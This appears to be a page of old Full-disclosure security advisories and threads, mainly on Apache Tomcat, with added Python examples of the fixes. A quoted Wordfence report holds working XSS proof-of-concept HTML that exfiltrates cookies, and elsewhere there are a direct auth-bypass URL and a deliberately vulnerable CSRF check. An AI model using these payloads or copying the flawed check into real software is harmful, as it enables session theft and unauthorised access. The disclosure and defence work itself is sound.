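    def __init__(self, users, rotate_before_login=True):
        self.store = SessionStore()
        self.users = users                       # constructed credential map
        self.rotate_before_login = rotate_before_login

    def request_protected(self, sid, target):
        """Returns (outcome, session_id_to_set, location)."""
        sid, sess = self.store.get_or_create(sid)
        if sess["user"] is not None:
            return "allow", sid, target
        sess["saved_request"] = target           # the "most recent request" the fix protects
        if self.rotate_before_login:
            sid = self.store.rotate(sid)         # fix, part 1: new id before the login page
        return "login", sid, None

    def submit_login(self, sid, username, password):
        sid, sess = self.store.get_or_create(sid)
        expected = self.users.get(username)
        if expected is None or not secrets.compare_digest(expected, password):
            return "login", sid, None
        sess["user"] = username
        target = sess["saved_request"] or "/"
        sess["saved_request"] = None
        sid = self.store.rotate(sid)             # fix, part 2: new id after authentication
        return "allow", sid, target


def simulate(rotate_before_login: bool) -> str:
    """Where the victim lands after login when someone who knows the victim's
    pre-login session id sends their own protected request during the login."""
    auth = FormAuthenticator({"alice": "correct horse battery"}, rotate_before_login)
    planted_sid, _ = auth.store.get_or_create(None)     # id the victim was made to use
    _, victim_sid, _ = auth.request_protected(planted_sid, "/account")
    auth.request_protected(planted_sid, "/injected")    # third-party request under the old id
    _, _, landing = auth.submit_login(victim_sid, "alice", "correct horse battery")
    return landing


if __name__ == "__main__":
    print("with pre-login rotation:   ", simulate(True))
    print("without pre-login rotation:", simulate(False))
```

With rotation the planted id stops referring to the victim's session the moment the login page is served, so a request sent under it lands in an unrelated new session and the victim is replayed to the page they actually asked for. Rotating again after authentication is the usual fixation defence and is kept here as well.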


[Full-disclosure] [SECURITY] CVE-2012-3544 Chunked transfer encoding extension size is not limited

2013-05-10 Thread Mark Thomas

CVE-2012-3544 Chunked transfer encoding extension size is not limited

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.29
- Tomcat 6.0.0 to 6.0.36

Description:
When processing a request submitted using the chunked transfer encoding,
Tomcat ignored but did not limit any extensions that were included. This
allows a client to perform a limited DoS by streaming an unlimited
amount of data to the server.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Tomcat 7.0.x users should upgrade to 7.0.30 or later
- Tomcat 6.0.x users should upgrade to 6.0.37 or later

Credit:
This issue was identified by Steve Jones.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html

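This advisory and its follow-up CVE-2013-4322 earlier on this page are about one parser property: a chunked-body decoder must bound how many bytes it will buffer while looking for the end of a chunk-size line (the extension lives there) and the end of a trailer line (the whitespace after the colon lives there); otherwise a client can keep streaming without ever completing a chunk. The decoder below is an added example written for this page in Python, not Tomcat's code; the limit values are chosen for illustration, not taken from Tomcat, and the sample bodies are constructed.

```python
class ChunkedError(ValueError):
    """Raised when a chunked body is malformed or exceeds a configured limit."""


# Illustrative limits (assumptions for this example, not Tomcat's defaults).
MAX_EXTENSION_BYTES = 64      # bytes allowed after the chunk size (";name=value...")
MAX_TRAILER_LINE_BYTES = 512  # whole trailer line: name, colon, whitespace, value
MAX_TRAILER_WS_BYTES = 8      # whitespace tolerated between ':' and the trailer value


def _read_line(body: bytes, pos: int, limit: int):
    """Return (line, next_pos) for the CRLF-terminated line starting at pos.

    The CRLF must begin within `limit` bytes. A stream that has produced more
    than that without a CRLF is rejected instead of being buffered further,
    which is the property the unlimited-extension bug lacked."""
    end = body.find(b"\r\n", pos, pos + limit + 2)
    if end < 0:
        if len(body) - pos > limit:
            raise ChunkedError(f"line exceeds {limit} bytes before CRLF")
        raise ChunkedError("incomplete line")
    return body[pos:end], end + 2


def decode_chunked(body: bytes):
    """Decode a complete chunked body. Returns (payload, trailers)."""
    out = bytearray()
    pos = 0
    while True:
        # chunk-size [ ";" chunk-ext ] CRLF
        line, pos = _read_line(body, pos, 16 + MAX_EXTENSION_BYTES)
        size_field, sep, extension = line.partition(b";")
        if sep and len(extension) > MAX_EXTENSION_BYTES:
            raise ChunkedError("chunk extension too long")
        try:
            size = int(size_field.strip(), 16)
        except ValueError:
            raise ChunkedError(f"bad chunk size {size_field!r}") from None
        if size < 0:
            raise ChunkedError("negative chunk size")
        if size == 0:
            break
        if len(body) < pos + size + 2:
            raise ChunkedError("incomplete chunk data")
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ChunkedError("chunk data not followed by CRLF")
        out += body[pos:pos + size]
        pos += size + 2

    trailers = {}
    while True:
        line, pos = _read_line(body, pos, MAX_TRAILER_LINE_BYTES)
        if line == b"":
            break                               # empty line ends the trailer section
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            raise ChunkedError(f"malformed trailer line {line!r}")
        leading_ws = len(value) - len(value.lstrip(b" \t"))
        if leading_ws > MAX_TRAILER_WS_BYTES:
            raise ChunkedError("excessive whitespace after ':' in trailer")
        trailers[name.strip().lower().decode("iso-8859-1")] = value.strip().decode("iso-8859-1")
    return bytes(out), trailers


def is_acceptable(body: bytes) -> bool:
    try:
        decode_chunked(body)
        return True
    except ChunkedError:
        return False


# Constructed sample bodies.
GOOD = b"4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n"
GOOD_EXT = b"4;name=value\r\nWiki\r\n0\r\nX-Checksum: abc\r\n\r\n"
LONG_EXT = b"4;" + b"a" * 300 + b"\r\nWiki\r\n0\r\n\r\n"
LONG_TRAILER_WS = b"0\r\nX-Checksum:" + b" " * 100 + b"abc\r\n\r\n"

if __name__ == "__main__":
    for label, body in (("good", GOOD), ("good_ext", GOOD_EXT),
                        ("long_ext", LONG_EXT), ("long_trailer_ws", LONG_TRAILER_WS)):
        print(f"{label:16s} acceptable={is_acceptable(body)}")
```

The windowed `find` in `_read_line` is what makes this a streaming-safe design even though the example works on a complete byte string: a real connector applies the same limit to the bytes read so far and closes the connection once the window is exhausted.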


Re: [Full-disclosure] 0day Vulnerability in VLC (this is my first release of the vuln anywhere)

2013-04-23 Thread Mark Felder
On Tue, 23 Apr 2013 09:51:55 -0500, Georgi Guninski  
gunin...@guninski.com wrote:



IMHO nobody should bother negotiating with terrorist vendors.


Open source programmers: the new terrorists of the 21st century



[Full-disclosure] [SECURITY] CVE-2013-0248 Apache Commons FileUpload - Insecure examples

2013-03-06 Thread Mark Thomas
CVE-2013-0248 Apache Commons FileUpload - Insecure examples

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
- Commons FileUpload 1.0 to 1.2.2

Description:
Commons FileUpload provides file upload capability for Servlets and web
applications. During the upload process, FileUpload may (depending on
configuration) save the uploaded file temporarily on disk. By default
this will be in the system wide tmp directory. Because the temporary
files have predictable file names and are stored in a publicly writeable
location they are vulnerable to a TOCTOU attack.

A successful attack requires that the attacker has write access to the
tmp directory. The attack can be prevented by setting the repository to
a non-publicly writeable location.

The documentation for FileUpload does not highlight the potential
security implications of not setting a repository, nor do the provided
examples set a repository. This may have caused users to use FileUpload
in an insecure manner.

Mitigation:
Setting the repository to a non-publicly writeable location such as that
defined by the ServletContext attribute javax.servlet.context.tempdir
will prevent the TOCTOU attack.

Credit:
This issue was identified by Karl Dyszynski and Hugo Vazquez Carames of
SonicWall

References:
[1] http://commons.apache.org/fileupload/

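The fix the advisory recommends, as an added example in Python (not Commons FileUpload's code): temporary upload files go into a directory that only the service user can write to, and each file is created with O_EXCL under an unpredictable name, so there is no window for a pre-created or swapped file. The directory check refuses a shared, world-writable location such as the system tmp directory. It assumes a POSIX host; the paths and upload bytes are constructed.

```python
import os
import stat
import tempfile


def is_private_dir(path: str) -> bool:
    """True if `path` is a directory owned by this process's user that neither
    group nor others can write to. A shared location such as /tmp fails this."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    if not stat.S_ISDIR(st.st_mode):
        return False
    if st.st_uid != os.geteuid():
        return False
    return not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def make_upload_repository(base: str) -> str:
    """Create base/uploads as a 0700 directory and verify it is private."""
    path = os.path.join(base, "uploads")
    os.makedirs(path, mode=0o700, exist_ok=True)
    os.chmod(path, 0o700)      # makedirs leaves an existing directory's mode alone
    if not is_private_dir(path):
        raise PermissionError(f"{path} is not a private directory")
    return path


def save_upload(repository: str, data: bytes) -> str:
    """Store uploaded bytes in a fresh file inside a private repository.

    mkstemp opens with O_CREAT|O_EXCL and mode 0600 under an unpredictable
    name, so another local user can neither pre-create the file nor guess it."""
    if not is_private_dir(repository):
        raise PermissionError("refusing to write uploads into a shared directory")
    fd, name = tempfile.mkstemp(prefix="upload-", suffix=".part", dir=repository)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return name


def read_upload(path: str) -> bytes:
    with open(path, "rb") as f:
        return f.read()


def demo() -> dict:
    """Round trip through a private repository, and the refusal of a
    world-writable directory standing in for the system tmp directory."""
    base = tempfile.mkdtemp()
    repo = make_upload_repository(base)
    stored = save_upload(repo, b"constructed upload bytes")
    shared = tempfile.mkdtemp()
    os.chmod(shared, 0o1777)   # emulate /tmp: sticky, world-writable
    try:
        save_upload(shared, b"x")
        refused = False
    except PermissionError:
        refused = True
    return {
        "roundtrip": read_upload(stored),
        "shared_refused": refused,
        "private_mode_ok": stat.S_IMODE(os.stat(repo).st_mode) == 0o700,
    }


if __name__ == "__main__":
    print(demo())
```

In a servlet container the equivalent of `base` is the per-context temporary directory the advisory names (the javax.servlet.context.tempdir attribute); the ownership and mode check is worth keeping even there, since a misconfigured container can hand out a shared path.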


[Full-disclosure] 'portable-phpMyAdmin (WordPress Plugin)' Authentication Bypass (CVE-2012-5469)

2012-12-13 Thread Mark Stanislav
I. DESCRIPTION
---
portable-phpMyAdmin doesn't verify an existing WordPress session
(privileged or not) when accessing the plugin file path directly. Because
of how this plugin works, a default installation will provide a full
phpMyAdmin console with the privilege level of the MySQL configuration of
WordPress.


II. TESTED VERSION
---
1.3.0


III. PoC EXPLOIT
---
Navigate to http://host/wp-content/plugins/portable-phpmyadmin/wp-pma-mod and
you will be presented with the full portable-phpMyAdmin web interface
without the requirement of a session or any credential.


IV. SOLUTION
---
Upgrade to version 1.3.1


V. REFERENCES
---
http://wordpress.org/extend/plugins/portable-phpmyadmin/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5469


VI. TIMELINE
---
10/13/2012 - Initial developer disclosure
10/14/2012 - Response from developer with commitment to fix the vulnerability
10/31/2012 - Follow-up with developer after no communication or patched release
11/16/2012 - Second attempt to follow-up with developer regarding progress/timetable
11/26/2012 - Contacted WordPress 'plugins team' about lack of progress on patched release
11/27/2012 - WordPress 'plugins team' patches software and releases version 1.3.1
12/12/2012 - Public disclosure

[Full-disclosure] CVE-2012-4534 Apache Tomcat denial of service

2012-12-04 Thread Mark Thomas
CVE-2012-4534 Apache Tomcat denial of service

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.27
- Tomcat 6.0.0 to 6.0.35

Description:
When using the NIO connector with sendfile and HTTPS enabled, if a
client breaks the connection while reading the response an infinite loop
is entered leading to a denial of service. This was originally reported
as https://issues.apache.org/bugzilla/show_bug.cgi?id=52858.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Tomcat 7.0.x users should upgrade to 7.0.28 or later
- Tomcat 6.0.x users should upgrade to 6.0.36 or later

Credit:
The security implications of this bug were identified by Arun Neelicattu
of the Red Hat Security Response Team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html



[Full-disclosure] CVE-2012-3546 Apache Tomcat Bypass of security constraints

2012-12-04 Thread Mark Thomas
CVE-2012-3546 Apache Tomcat Bypass of security constraints

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.29
- Tomcat 6.0.0 to 6.0.35
Earlier unsupported versions may also be affected

Description:
When using FORM authentication it was possible to bypass the security
constraint checks in the FORM authenticator by appending
/j_security_check to the end of the URL if some other component (such
as the Single-Sign-On valve) had called request.setUserPrincipal()
before the call to FormAuthenticator#authenticate().

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Tomcat 7.0.x users should upgrade to 7.0.30 or later
- Tomcat 6.0.x users should upgrade to 6.0.36 or later

Credit:
This issue was identified by The Tomcat security team

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html



[Full-disclosure] CVE-2012-4431 Apache Tomcat Bypass of CSRF prevention filter

2012-12-04 Thread Mark Thomas
CVE-2012-4431 Apache Tomcat Bypass of CSRF prevention filter

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.31
- Tomcat 6.0.0 to 6.0.35

Description:
The CSRF prevention filter could be bypassed if a request was made to a
protected resource without a session identifier present in the request.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Tomcat 7.0.x users should upgrade to 7.0.32 or later
- Tomcat 6.0.x users should upgrade to 6.0.36 or later

Credit:
This issue was identified by The Tomcat security team

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html

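The flaw described in the advisory above, reduced to its logic and shown beside a fail-closed version. This is an added Python illustration, not Tomcat's CsrfPreventionFilter source; the request and session objects, the entry-point list and the parameter name are constructed for the example.

```python
"""Nonce-based CSRF check in the shape that was bypassable, beside a fixed shape.

Added example, not Tomcat's CsrfPreventionFilter: it reproduces only the logic
flaw described for CVE-2012-4431, a filter that validated the nonce against the
session's nonce cache when a session existed, and therefore had nothing to
reject when the request carried no session identifier at all.
"""
import secrets

NONCE_PARAM = "csrf_nonce"            # constructed request parameter name
ENTRY_POINTS = {"/index", "/login"}   # pages reachable without a nonce (constructed)


class Session:
    """Holds the few most recently issued nonces for one client."""

    def __init__(self, keep=5):
        self.keep = keep
        self.nonce_cache = []

    def new_nonce(self):
        nonce = secrets.token_hex(8)
        self.nonce_cache.append(nonce)
        del self.nonce_cache[:-self.keep]      # keep only the newest `keep` nonces
        return nonce


class Request:
    def __init__(self, path, params=None, session=None):
        self.path = path
        self.params = params or {}
        self.session = session   # None when the request carried no session id


def csrf_check_vulnerable(req):
    """True when the request may proceed.  The nonce cache is only consulted
    when a session exists, so a request without a session is never compared
    against anything and passes: that is the bypass."""
    if req.path in ENTRY_POINTS:
        return True
    cache = req.session.nonce_cache if req.session is not None else None
    if cache is not None and req.params.get(NONCE_PARAM) not in cache:
        return False
    return True


def csrf_check_fixed(req):
    """Same check, failing closed: a protected resource needs a session, a
    nonce parameter, and a match between the two."""
    if req.path in ENTRY_POINTS:
        return True
    if req.session is None:
        return False
    nonce = req.params.get(NONCE_PARAM)
    return nonce is not None and nonce in req.session.nonce_cache


def demo():
    """Run four requests through both checks: {name: (vulnerable, fixed)}."""
    session = Session()
    nonce = session.new_nonce()
    cases = {
        "valid": Request("/admin/action", {NONCE_PARAM: nonce}, session),
        "no_session": Request("/admin/action", {}),          # no session id at all
        "bad_nonce": Request("/admin/action", {NONCE_PARAM: "0000"}, session),
        "entry_point": Request("/index"),
    }
    return {name: (csrf_check_vulnerable(r), csrf_check_fixed(r)) for name, r in cases.items()}


if __name__ == "__main__":
    for name, (vulnerable, fixed) in demo().items():
        print(f"{name:12s} vulnerable={vulnerable} fixed={fixed}")
```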


[Full-disclosure] [SECURITY] CVE-2012-2733 Apache Tomcat Denial of Service

2012-11-05 Thread Mark Thomas
CVE-2012-2733 Apache Tomcat Denial of Service

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.27
- Tomcat 6.0.0 to 6.0.35

Description:
The checks that limited the permitted size of request headers were
implemented too late in the request parsing process for the HTTP NIO
connector. This enabled a malicious user to trigger an
OutOfMemoryError by sending a single request with very large headers.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Tomcat 7.0.x users should upgrade to 7.0.28 or later
- Tomcat 6.0.x users should upgrade to 6.0.36 or later

Credit:
This issue was identified by Josh Spiewak.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html




[Full-disclosure] [SECURITY] CVE-2012-3439 Apache Tomcat DIGEST authentication weaknesses

2012-11-05 Thread Mark Thomas
CVE-2012-3439 Apache Tomcat DIGEST authentication weaknesses

Severity: Moderate

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.29
- Tomcat 6.0.0 to 6.0.35
- Tomcat 5.5.0 to 5.5.35
- Earlier, unsupported versions may also be affected

Description:
Three weaknesses in Tomcat's implementation of DIGEST authentication
were identified and resolved:
1. Tomcat tracked client rather than server nonces and nonce count.
2. When a session ID was present, authentication was bypassed.
3. The user name and password were not checked before indicating
   that a nonce was stale.
These issues reduced the security of DIGEST authentication making
replay attacks possible in some circumstances.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Tomcat 7.0.x users should upgrade to 7.0.30 or later
- Tomcat 6.0.x users should upgrade to 6.0.36 or later
- Tomcat 5.5.x users should upgrade to 5.5.36 or later

Credit:
The first issue was identified by Tilmann Kuhn. The second and third
issues were identified by the Tomcat security team during the code
review resulting from the first issue.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html

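Server-side nonce tracking of the kind the first and third items of the advisory above call for, as an added Python illustration (not Tomcat's DigestAuthenticator): the server issues its own nonces, records the highest nonce count accepted per nonce so a resubmitted request is refused, and verifies the credentials before ever answering that a nonce is stale. The realm, user store and clock are constructed for the demo, and only qop=auth is handled.

```python
"""Server-side nonce and nonce-count tracking for HTTP Digest authentication.

Added example, not Tomcat's DigestAuthenticator: the server issues its own
nonces, records the highest nc accepted per nonce so a resubmitted request is
refused, and checks the credentials before ever answering 'stale'.  Realm,
user store and clock are constructed for the demo; qop=auth only.
"""
import hashlib
import hmac
import os
import time

REALM = "example"          # constructed realm
NONCE_TTL_SECONDS = 300    # lifetime of an issued nonce


def _md5(text):
    return hashlib.md5(text.encode()).hexdigest()


def make_ha1(username, password):
    """HA1 as stored server-side: MD5(username:realm:password)."""
    return _md5(f"{username}:{REALM}:{password}")


class NonceTracker:
    """Issues nonces and remembers, per nonce, the highest nc accepted so far."""

    def __init__(self, ttl=NONCE_TTL_SECONDS, now=time.time):
        self._ttl = ttl
        self._now = now        # injectable clock so expiry is testable
        self._issued = {}      # nonce -> [issued_at, last_nc]

    def issue(self):
        nonce = os.urandom(16).hex()
        self._issued[nonce] = [self._now(), 0]
        return nonce

    def check(self, nonce, nc_hex):
        """'ok', 'stale' (never issued or expired) or 'replay' (nc did not increase)."""
        entry = self._issued.get(nonce)
        if entry is None:
            return "stale"
        if self._now() - entry[0] > self._ttl:
            del self._issued[nonce]
            return "stale"
        try:
            nc = int(nc_hex, 16)
        except ValueError:
            return "replay"
        if nc <= entry[1]:
            return "replay"    # same or lower nc: this request was seen before
        entry[1] = nc
        return "ok"


def client_digest(username, password, method, uri, nonce, nc, cnonce="0a4f113b"):
    """Fields a client sends in Authorization: Digest (qop=auth)."""
    ha2 = _md5(f"{method}:{uri}")
    response = _md5(":".join([make_ha1(username, password), nonce, nc, cnonce, "auth", ha2]))
    return {"username": username, "uri": uri, "nonce": nonce, "nc": nc,
            "cnonce": cnonce, "qop": "auth", "response": response}


def verify_digest(tracker, users, auth, method):
    """'ok', 'bad-credentials', 'stale' or 'replay' for a parsed Digest header.
    Credentials are verified first, so a 'stale' answer never reveals whether
    the password was right; only then is the nonce checked against the
    server's own records."""
    ha1 = users.get(auth.get("username"))
    if ha1 is None:
        return "bad-credentials"
    ha2 = _md5(f"{method}:{auth['uri']}")
    expected = _md5(":".join([ha1, auth["nonce"], auth["nc"], auth["cnonce"], auth["qop"], ha2]))
    if not hmac.compare_digest(expected, auth.get("response", "")):
        return "bad-credentials"
    return tracker.check(auth["nonce"], auth["nc"])


def demo():
    """Six requests against one issued nonce; returns the verdict for each."""
    clock = [1000.0]
    tracker = NonceTracker(now=lambda: clock[0])
    users = {"alice": make_ha1("alice", "s3cret")}    # constructed user store
    nonce = tracker.issue()
    attempts = [
        ("alice", "s3cret", nonce, "00000001"),       # first use: ok
        ("alice", "s3cret", nonce, "00000001"),       # identical resend: replay
        ("alice", "s3cret", nonce, "00000002"),       # nc advanced: ok
        ("alice", "s3cret", "deadbeef", "00000001"),  # nonce the server never issued: stale
        ("alice", "wrong", "deadbeef", "00000001"),   # bad password reported before staleness
    ]
    verdicts = [verify_digest(tracker, users, client_digest(u, p, "GET", "/private", n, nc), "GET")
                for u, p, n, nc in attempts]
    clock[0] += NONCE_TTL_SECONDS + 1                 # nonce lifetime elapsed
    late = client_digest("alice", "s3cret", "GET", "/private", nonce, "00000003")
    verdicts.append(verify_digest(tracker, users, late, "GET"))   # expired: stale
    return verdicts


if __name__ == "__main__":
    print(demo())
```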


Re: [Full-disclosure] XSS and IAA vulnerabilities in Wordfence Security for WordPress

2012-10-21 Thread Mark Maunder
This has been fixed and the release just went out. Version 3.3.7.

The email param is now escaped and we've added rate limiting to the form
with a 3 minute backoff if the limit is exceeded.

http://wordpress.org/extend/plugins/wordfence/changelog/

Thanks for your report.

Regards,

Mark Maunder.



On Fri, Oct 19, 2012 at 7:16 PM, MustLive mustl...@websecurity.com.ua wrote:

 Hello list!

 I want to warn you about Cross-Site Scripting and Insufficient
 Anti-automation vulnerabilities in Wordfence Security for WordPress.

 Wordfence is a security plugin for WordPress.

 -
 Affected products:
 -

 Vulnerable are Wordfence Security 3.3.5 and previous versions.

 --
 Details:
 --

 XSS (WASC-08):

 Wordfence Security XSS.html

 <html>
 <head>
 <title>Wordfence Security XSS exploit (C) 2012 MustLive.
 http://websecurity.com.ua</title>
 </head>
 <body onLoad="document.hack.submit()">
 <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
 <input type="hidden" name="email"
 value="<script>alert(document.cookie)</script>">
 </form>
 </body>
 </html>

 Insufficient Anti-automation (WASC-21):

 Wordfence Security IAA.html

 <html>
 <head>
 <title>Wordfence Security IAA exploit (C) 2012 MustLive.
 http://websecurity.com.ua</title>
 </head>
 <body onLoad="document.hack.submit()">
 <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
 <input type="hidden" name="email" value="ad...@e-mail.com">
 </form>
 </body>
 </html>

 I've informed the plugin developer about the vulnerabilities and mentioned
 them at my site (http://websecurity.com.ua/6106/).

 Best wishes & regards,
 MustLive
 Administrator of Websecurity web site
 http://websecurity.com.ua






-- 
Mark Maunder mmaun...@gmail.com
France: (+33) 068-700-8029

Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent

2012-09-07 Thread Mark
You didn't download it from download.cnet.com, by any chance?
Sounds more like an infection to me.
For windows, download and run the following programs.
http://www.filehippo.com/download_malwarebytes_anti_malware/
http://www.filehippo.com/download_spybot_search_destroy/5168/
http://www.filehippo.com/download_superantispyware/


On 06/09/2012 19:09, Jeffrey Walton wrote:
 The company that writes the world's most insecure software [1,2,3] has
 figured out a way to further increase an attack surface.
 
 Adobe now includes additional warez in their updates without consent.
 The warez includes a browser and toolbar. The attached image is what
 I got when I agreed to update Adobe Flash because of recent security
 vulnerability fixes.
 
 It appears Adobe has become a whore to Google like Mozilla.
 
 +1 Adobe.
 
 [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
 [2] 
 http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on
 [3] http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
 [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/
 
 
 
 



Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent

2012-09-07 Thread Mark
You're right. Jeffrey is no newb. Sorry if it came over the wrong way.

On 08/09/2012 0:31, Michael D. Wood wrote:
 You guys are acting like Jeffrey is a newb to all this stuff.  I'm sure
 he knows what mbam and spybot are, and is able to scan his machine. I'm
 sure he knows to go straight to the source when downloading flash
 player, albeit Adobe does include the annoying toolbar unless you choose
 not to install.
 
 --
 Michael D. Wood
 ITSecurityPros.org
 www.itsecuritypros.org
 
 - Reply message -
 From: Mark boogiebr...@yahoo.co.uk
 To: noloa...@gmail.com
 Cc: Full Disclosure full-disclosure@lists.grok.org.uk, BugTraq
 bugt...@securityfocus.com
 Subject: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez
 without Consent
 Date: Fri, Sep 7, 2012 5:32 pm
 
 
 You didn't download it from download.cnet.com, by any chance?
 Sounds more like an infection to me.
 For windows, download and run the following programs.
 http://www.filehippo.com/download_malwarebytes_anti_malware/
 http://www.filehippo.com/download_spybot_search_destroy/5168/
 http://www.filehippo.com/download_superantispyware/
 
 
 On 06/09/2012 19:09, Jeffrey Walton wrote:
 The company that writes the world's most insecure software [1,2,3] has
 figured out a way to further increase an attack surface.

 Adobe now includes additional warez in their updates without consent.
 The warez includes a browser and toolbar. The attached image is what
 I got when I agreed to update Adobe Flash because of recent security
 vulnerability fixes.

 It appears Adobe has become a whore to Google like Mozilla.

 +1 Adobe.

 [1] http://www.google.com/#q=Adobe+site%3Asecurityfocus.com.
 [2]
 http://web.nvd.nist.gov/view/vuln/search-results?query=adobesearch_type=allcves=on
 [3]
 http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/
 [4] http://www.theregister.co.uk/2009/12/29/security_predictions_2010/




 



Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-10 Thread Mark Shuler
Nudging everyone back to the alleged Obama tactics. I'm sure everyone
has an idea for the big push for cyber warriors in the United States.

By the arguments I'm hearing, and milling through some of the other infosec
posts, who do you believe has more capability for cyber terror? NSA?
Private industry? Hell, maybe there are already cyber PMCs running without
a leash.
On Jun 9, 2012 4:55 PM, Jason Hellenthal jhellent...@dataix.net wrote:


 Funny, I think I meant to add any system I own. I am all about DTRT and
 support my government in any which way needed but creating shells on
 systems I don't own is not my business.

 On Sat, Jun 09, 2012 at 04:07:39PM +0300, John Doe wrote:
  By any chance, Jason Hellenthal, do you work for the NOVO medical group?
 Or
  is it just NOVO1?
 
  I'm asking, because you saying what you say there below, indicates that
 you
  may pose a security problem for some health related medical information
 on
  people that should be of no interest to NSA or national security.
  You know, there are such things as due process. And you saying you're
  willing to give access
  to anyone from NSA to all systems you have access to is a pretty tall
 deal,
  when you're the IT guy for a corporation. Someone might feel you're
  betraying their trust and even working against their interest when
  willingly allowing the abuse of their systems, be it for right or wrong
  for whatever clandestine purpose.
 
  There should be a global NO-HIRE list for guys like you.
 
  On Sat, Jun 9, 2012 at 4:56 AM, Jason Hellenthal jhellent...@dataix.net
 wrote:
 
  
   Shit, Ill give the NSA a shell on any system... if it means achieving a
   greater goal. Whether its wrong or not... let the bots decide who is
 the
   better player as long as it brings the US into a primary position of
   power.
  
   On Wed, Jun 06, 2012 at 11:22:32PM -0400, Laurelai wrote:
On 6/6/12 2:23 PM, Peter Dawson wrote:
 haha..da retrun of da farewell dossier !!

 On Wed, Jun 6, 2012 at 2:21 PM, coderman coder...@gmail.com
 mailto:coder...@gmail.com wrote:

 On Wed, Jun 6, 2012 at 11:16 AM, coderman coder...@gmail.com
 mailto:coder...@gmail.com wrote:
  ... uncle sam has been up in yer SCADA for
  two decades.

 three decades; too early for maths!






Guys can we focus on the fact that the US Government is en masse
accessing computer systems without due process, and trying to
prosecute the people who made this known to the public.
  
  
  
   --
  
- (2^(N-1))
  
  

 --

  - (2^(N-1))



Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran

2012-06-07 Thread Mark Shuler
Nothing will change as long as we watch.  Those who are in power will
continue to do as they please.
On Jun 7, 2012 1:54 PM, Laurelai laure...@oneechan.org wrote:

 On 6/7/12 1:48 PM, Ian Hayes wrote:
  On Thu, Jun 7, 2012 at 1:40 PM, andrew.wallace
  andrew.wall...@rocketmail.com wrote:
  On Tue, Jun 5, 2012 at 8:43 PM,  valdis.kletni...@vt.edu wrote:
  One could equally well read that as We're fed up and about to
  pound North Korea even further back into the Stone Age.
  With Stuxnet, it was lucky nobody was seriously injured.
 
  You cannot condone such weapons Valdis, or your hat will start to turn
  grey, black.
  Stuxnet may not have killed anyone, but several Iranian nuclear
  scientists were assassinated in conjunction with Stuxnet's release.
 
 Civilian scientists at that.



[Full-disclosure] OpenSSL Security Advisory

2012-04-24 Thread Mark J Cox
OpenSSL Security Advisory [24 Apr 2012]
===

ASN1 BIO incomplete fix (CVE-2012-2131)
===

It was discovered that the fix for CVE-2012-2110 released on 19 Apr
2012 was not sufficient to correct the issue for OpenSSL 0.9.8.

Please see http://www.openssl.org/news/secadv_20120419.txt for details
of that vulnerability.

This issue only affects OpenSSL 0.9.8v.  OpenSSL 1.0.1a and 1.0.0i
already contain a patch sufficient to correct CVE-2012-2110.

Thanks to Red Hat for discovering and fixing this issue.

Affected users should upgrade to 0.9.8w.

References
==

URL for this Security Advisory:
http://www.openssl.org/news/secadv_20120424.txt




Re: [Full-disclosure] Most Linux distributions don't use tmpfs nor encrypt swap by default

2012-04-17 Thread Mark Krenz
On Sun, Apr 15, 2012 at 02:57:33PM GMT, Pedro Martelletto 
[pe...@ambientworks.net] said the following:
  I know OpenBSD has an encrypt swapfs setting on its rc.conf file
  though not activated by default.
 
 i believe it is activated by default:
 
 http://marc.info/?l=openbsd-cvsm=85331505174
 

 Thanks for catching that. Sorry, what I had in e-mail was wrong, but
the chart on the report is correct.  I think I meant FreeBSD.


-- 
Mark S. Krenz
IT Director
Suso Technology Services, Inc.
 
Sent from Mutt using Linux



Re: [Full-disclosure] Most Linux distributions don't use tmpfs nor encrypt swap by default

2012-04-13 Thread Mark Krenz
On Thu, Apr 12, 2012 at 10:53:47PM GMT, Grandma Eubanks [tborla...@gmail.com] 
said the following:
 Fedora Core 15:
 
 /dev/mapper/vg_youwish-lv_swap  swap   swap   defaults  0 0
